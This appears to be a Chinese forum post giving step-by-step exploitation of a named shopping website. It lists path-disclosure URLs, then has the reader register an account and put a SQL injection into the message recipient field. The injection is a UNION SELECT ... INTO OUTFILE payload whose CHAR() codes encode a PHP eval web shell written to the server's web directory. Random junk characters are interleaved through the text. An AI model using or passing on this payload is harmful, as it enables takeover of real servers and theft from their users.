第一个:想办法找到目标网站的绝对路径
% `: u+ y8 v' m9 c# E) b Y/ ~7 B2 F J7 r' U# f
http://www.political-security.com/install/svinfo.php?phpinfo=true( w* c4 \' c: U i+ b4 s' W
" w) C( c6 D, g+ a0 u8 bhttp:/www.political-security.com/core/api/shop_api.php
% T [9 s4 \. q/ k* j& ~2 F2 N6 w& B' o2 O2 K$ o' E. r* d, w
http://www.political-security.co ... api_b2b_2_0_cat.php8 G) k) R6 `7 a1 ^
7 ~: _7 D3 v5 p. q0 J) t4 A
http://www.political-security.com/core/ap ... b_2_0_goodstype.php, {3 t' A. u% @" W. k1 B4 b: d
; r; p7 F/ E% M2 B
http://www.political-security.co ... i_b2b_2_0_brand.php1 I7 k( j" |" @, b6 D; {
第二个:注册一个普通用户% L1 v' Y* p; F* i0 q [
8 K2 ^1 i( o- t+ m5 _) Y7 K. j
http://www.political-security.com/?passport-signup.html
6 {$ p6 L* {9 q! f' U. P: K+ S8 S! g
第三个: 发送消息
) ?4 Z( U/ Y" z8 |3 V) S6 L- }$ n
http://www.political-security.com/?member-send.html+ n, o+ A- s9 W- b4 c/ e1 N# H
发送给中填写
$ D; T' C+ F2 {antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |